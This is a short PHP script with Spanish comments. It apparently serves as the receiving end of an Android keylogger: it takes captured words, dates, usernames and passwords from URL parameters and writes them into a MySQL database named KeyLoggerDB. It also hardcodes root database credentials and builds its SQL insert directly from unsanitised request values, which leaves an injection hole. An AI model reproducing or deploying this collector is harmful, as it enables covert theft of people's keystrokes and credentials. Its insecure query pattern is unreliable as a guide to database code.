<?php

	//recibimos los parametros desde android...
	$word = $_GET['word'];
	$date = $_GET['date'];
	$user = $_GET['user'];
	$pass = $_GET['pass'];

	//variables de base de datos....
	$conex = mysql_connect("localhost", "root", "david") or die ("error de conexion");//nos conectamos a la base de datos...

	$db = "KeyLoggerDB";
	mysql_select_db($db, $conex);//seleccionamos la base de datos...

	//hacemos la consulta para determinar en cual id van...
	$query = "SELECT * from Word";//string de consulta...

	$resultados = mysql_query($query);//obtenemos los resultados...

	$cont=0;

	//ciclo de obtencion de consulta...
	while($fila=mysql_fetch_array($resultados)){
    	
    	$cont++;
  	}

  	$id = $cont+1;//obtenemos el id...

  	//hacemos la insercion de datos...
  	$query = "INSERT INTO Word (idWord, Content, DateCaptura, User_Name, User_Pass) values ($id, '$word', '$date', '$user', '$pass')";
  	mysql_query($query);
?>